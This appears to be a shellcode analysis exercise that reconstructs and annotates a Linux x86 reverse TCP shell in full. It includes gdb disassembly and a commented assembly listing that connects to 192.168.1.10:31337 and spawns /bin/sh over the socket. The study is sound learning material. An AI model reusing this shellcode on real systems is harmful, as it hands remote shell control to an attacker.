1. Reverse TCP bind shell
Using the original hex encoded shellcode, we attempt to reconstruct the original file and make some modifications and optimizations of our own.
First, let’s copy to a file to make some modifications.
Compiling original file:
$ ../compile_c.sh c_linx86_revtcp_bind_shellstorm_sample1_original
[+] Compiling ...
[+] Done!
Debugging with GDB:
$ gdb -q ./c_linx86_revtcp_bind_shellstorm_sample1_original
Setting a breakpoint at the `code` function:
gdb-peda$ b *&code
Breakpoint 1 at 0x804a040
Printing out the code section (and later saving it to a file):
We copy only up to the last int 0x80: the trailing `add BYTE PTR [eax],al` is gdb disassembling the bytes that follow the shellcode, so that line isn’t required for functionality.
gdb-peda$ x/45i &code
=> 0x804a040 <code>: xor eax,eax
0x804a042 <code+2>: xor ebx,ebx
0x804a044 <code+4>: xor ecx,ecx
0x804a046 <code+6>: xor edx,edx
0x804a048 <code+8>: mov al,0x66
0x804a04a <code+10>: mov bl,0x1
0x804a04c <code+12>: push ecx
0x804a04d <code+13>: push 0x6
0x804a04f <code+15>: push 0x1
0x804a051 <code+17>: push 0x2
0x804a053 <code+19>: mov ecx,esp
0x804a055 <code+21>: int 0x80
0x804a057 <code+23>: mov esi,eax
0x804a059 <code+25>: mov al,0x66
0x804a05b <code+27>: xor ebx,ebx
0x804a05d <code+29>: mov bl,0x2
0x804a05f <code+31>: push 0xa01a8c0
0x804a064 <code+36>: pushw 0x697a
0x804a068 <code+40>: push bx
0x804a06a <code+42>: inc bl
0x804a06c <code+44>: mov ecx,esp
0x804a06e <code+46>: push 0x10
0x804a070 <code+48>: push ecx
0x804a071 <code+49>: push esi
0x804a072 <code+50>: mov ecx,esp
0x804a074 <code+52>: int 0x80
0x804a076 <code+54>: xor ecx,ecx
0x804a078 <code+56>: mov cl,0x3
0x804a07a <code+58>: dec cl
0x804a07c <code+60>: mov al,0x3f
0x804a07e <code+62>: int 0x80
0x804a080 <code+64>: jne 0x804a07a <code+58>
0x804a082 <code+66>: xor eax,eax
0x804a084 <code+68>: push edx
0x804a085 <code+69>: push 0x68732f6e
0x804a08a <code+74>: push 0x69622f2f
0x804a08f <code+79>: mov ebx,esp
0x804a091 <code+81>: push edx
0x804a092 <code+82>: push ebx
0x804a093 <code+83>: mov ecx,esp
0x804a095 <code+85>: push edx
0x804a096 <code+86>: mov edx,esp
0x804a098 <code+88>: mov al,0xb
0x804a09a <code+90>: int 0x80
0x804a09c <code+92>: add BYTE PTR [eax],al
Using GDB logging to write the listing to a file
gdb-peda$ set logging file gdb_linx86_revtcp_bind_shellstorm_sample1.txt
gdb-peda$ set logging on
Redirecting output to gdb_linx86_revtcp_bind_shellstorm_sample1.txt.
gdb-peda$ x/44i &code
gdb-peda$ set logging off
Done logging to gdb_linx86_revtcp_bind_shellstorm_sample1.txt.
Processing the logged file with AWK
Using some AWK and SED Fu, we strip the addresses and labels and copy the output to a file for manual ASM analysis.
$ awk '{print substr($0, index($0, $3))}' gdb_linx86_revtcp_bind_shellstorm_sample1.txt | sed -e 's/<code>:\t//' | sed -e 's/<code+58>//'
; Disassembly of the sample as dumped by gdb (Intel syntax), Linux x86 32-bit.
; Syscall ABI: int 0x80 with eax = syscall number, args in ebx, ecx, edx;
; only eax is changed by the kernel on return.
; Analyst's annotation of what each stage does; the instructions are unchanged.
; NOTE(review): the dump came from the C harness build, so the one absolute
; address below is an artifact of that build, not part of the shellcode.
; --- stage 1: socket() via socketcall(SYS_SOCKET) ---
xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx                             ; edx is never written again: it serves as the NULL/0 source in stage 4
mov al,0x66                             ; 0x66 = 102 = socketcall
mov bl,0x1                              ; SYS_SOCKET = 1
push ecx                                ; pushes 0; extra slot beyond the three socket() arguments
push 0x6                                ; protocol = 6 (IPPROTO_TCP)
push 0x1                                ; type     = 1 (SOCK_STREAM)
push 0x2                                ; domain   = 2 (AF_INET)
mov ecx,esp                             ; ecx -> {2, 1, 6} argument array
int 0x80                                ; eax = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
mov esi,eax                             ; esi = socket fd (return value is not checked for error)
; --- stage 2: connect() via socketcall(SYS_CONNECT) ---
mov al,0x66                             ; socketcall again
xor ebx,ebx
mov bl,0x2                              ; bl = 2: reused as sin_family (AF_INET) before becoming SYS_CONNECT
push 0xa01a8c0                          ; sin_addr: bytes c0 a8 01 0a = 192.168.1.10 (hard-coded remote address; a triage indicator for this sample)
pushw 0x697a                            ; sin_port: bytes 7a 69 = 0x7a69 = 31337 in network byte order
push bx                                 ; sin_family = AF_INET (16-bit field)
inc bl                                  ; bl = 3 = SYS_CONNECT; ebx keeps this value from here on
mov ecx,esp                             ; ecx -> struct sockaddr_in {AF_INET, 31337, 192.168.1.10}
push 0x10                               ; addrlen = 16
push ecx                                ; &sockaddr
push esi                                ; sockfd
mov ecx,esp                             ; ecx -> {sockfd, &sockaddr, 16}
int 0x80                                ; connect(sockfd, &sockaddr, 16); result not checked
; --- stage 3: dup2 loop, redirect fds 2, 1, 0 onto the socket ---
xor ecx,ecx
mov cl,0x3                              ; loop counter: newfd takes the values 2, 1, 0
dec cl                                  ; loop top: newfd = cl - 1; sets ZF when cl reaches 0
mov al,0x3f                             ; 0x3f = 63 = dup2
int 0x80                                ; dup2(ebx, ecx): NOTE oldfd is ebx == 3 (left over from SYS_CONNECT),
                                        ; not esi, so this assumes the socket was assigned fd 3 — fragile
                                        ; whenever the host process already has other descriptors open
jne 0x804a07a                           ; loop while cl != 0; relies on ZF from "dec cl" surviving the syscall.
                                        ; 0x804a07a is the gdb-resolved address of <code+58> ("dec cl" above)
                                        ; in this build; the sed pass stripped the label, leaving the address
; --- stage 4: execve("//bin/sh", ["//bin/sh", NULL], [NULL]) ---
xor eax,eax
push edx                                ; NUL terminator (edx == 0 since stage 1)
push 0x68732f6e                         ; "n/sh"
push 0x69622f2f                         ; "//bi"  -> stack now holds "//bin/sh\0"
mov ebx,esp                             ; ebx = pathname
push edx                                ; argv[1] = NULL
push ebx                                ; argv[0] = pathname
mov ecx,esp                             ; ecx = argv
push edx                                ; envp[0] = NULL
mov edx,esp                             ; edx = envp
mov al,0xb                              ; 0xb = 11 = execve
int 0x80                                ; replaces the process with a shell whose stdio is the socket
$ awk '{print substr($0, index($0, $3))}' gdb_linx86_revtcp_bind_shellstorm_sample1.txt | sed -e 's/<code>:\t//' | sed -e 's/<code+58>//' > asm_linx86_revtcp_bind_shellstorm_sample1.asm
Copying the file for our own modifications
$ cp asm_linx86_revtcp_bind_shellstorm_sample1.asm asm_linx86_revtcp_bind_shellstorm_sample1-alt.asm